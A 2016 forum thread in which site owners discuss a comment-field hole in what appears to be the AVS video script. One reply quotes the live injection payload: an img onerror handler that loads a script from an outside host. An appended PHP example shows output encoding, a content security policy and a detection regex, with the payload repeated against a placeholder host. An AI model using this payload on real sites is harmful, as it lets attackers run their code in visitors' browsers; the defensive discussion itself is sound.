
Attention hackers and comments!!!!!


25 replies to this topic

#21 Damien

Posted 24 July 2016 - 01:47 AM

avs admin imagine that will upgrade, for other people who have no solution.

 

What solution? I only see a joke as far as support goes. I doubt the guy who owns this script can even write hello world in PHP.


Edited by Damien, 24 July 2016 - 01:53 AM.


#22 apple82

Posted 24 July 2016 - 06:25 AM

What solution? I only see a joke as far as support goes. I doubt the guy who owns this script can even write hello world in PHP.

 

Yes, send email support avs.



#23 Damien

Posted 29 July 2016 - 07:08 AM

Yes, send email support avs.

 

We don't have this problem, we've solved it with a filter. Also anyone using nginx can set a content security policy anyway, his .js script won't work then. https://content-security-policy.com/

My other point is no one should need to ask for help with this, it's a hole in the comments system that should be patched and updated, it's letting him run a .js file, it's an exploit imo.


Edited by Damien, 29 July 2016 - 07:10 AM.


#24 theone

Posted 22 November 2016 - 01:39 AM

I'm assuming this was patched in AVS 4, but if anyone has not fixed this I have a mod that will detect the malicious code and prevent the comment from posting, immediately ban the user, and provide you with a range of information about the malicious person including computer / browser specs, IP, geolocation, etc.



#25 Yikmings

Posted 24 November 2016 - 10:47 AM

I fixed it by disabling and cleaning all comments in SQL.



#26 brianatthebeach

Posted Yesterday, 05:53 AM

Anyone know if this is fixed? I am currently on AVS 3.3. When I put in the comment

<img src=virink onerror=s=createElement('script');body.appendChild(s);s.src='http://www.besissy.com/h.js';><img src = etc etc
mg src=virink onerror=s=createElement('script');body.appendChild(s);s.src='http://www.besissy.com/h.js';>mg src = etc etc

the left angle bracket and i (<i) is removed from each occurrence in the comment.

 

Does this indicate I have a fix applied with 3.3?

 

Thanks,

Brian
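
Added example, not AVS code and not written by anyone in this thread: a sketch of the two defences discussed above (a comment filter and a content security policy) plus a check for comments already stored. It encodes the comment on output instead of removing chosen character sequences, since encoding covers every tag and handler rather than only the strings a strip rule matches. The function names, the policy value and the placeholder host `attacker.example` are assumptions.

```php
<?php
// Added example, not AVS code. Function names and the policy value are assumptions.

// Encode a stored comment for an HTML text context at output time. <, >, &, " and '
// all become entities, so the browser never sees a tag or an onerror= attribute.
function render_comment(string $raw): string
{
    return nl2br(htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}

// Second layer: with no 'unsafe-inline' in script-src the browser refuses inline
// event handlers and scripts from other origins. Extend the source list with the
// origins the site really loads scripts from. nginx equivalent:
//   add_header Content-Security-Policy "default-src 'self'; script-src 'self'" always;
function send_csp(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

// Heuristic for reviewing comments already in the database: true when the text
// contains something shaped like a tag or an on<event>= attribute.
function looks_like_markup(string $raw): bool
{
    return preg_match('/<\s*[a-z!\/?]|\bon[a-z]+\s*=/i', $raw) === 1;
}

// Constructed sample: the comment quoted in the thread, with a placeholder host.
$sample = "<img src=virink onerror=s=createElement('script');"
        . "body.appendChild(s);s.src='http://attacker.example/h.js';>";

if (PHP_SAPI !== 'cli') {
    send_csp(); // headers must be sent before any output
}
echo render_comment($sample), PHP_EOL;
var_dump(looks_like_markup($sample));               // tag and handler present
var_dump(looks_like_markup('Great video, thanks')); // plain text
```

Run from the command line, it prints the encoded comment as inert text followed by the two detector results; in a page, `render_comment()` belongs at the point where the comment is written into the HTML.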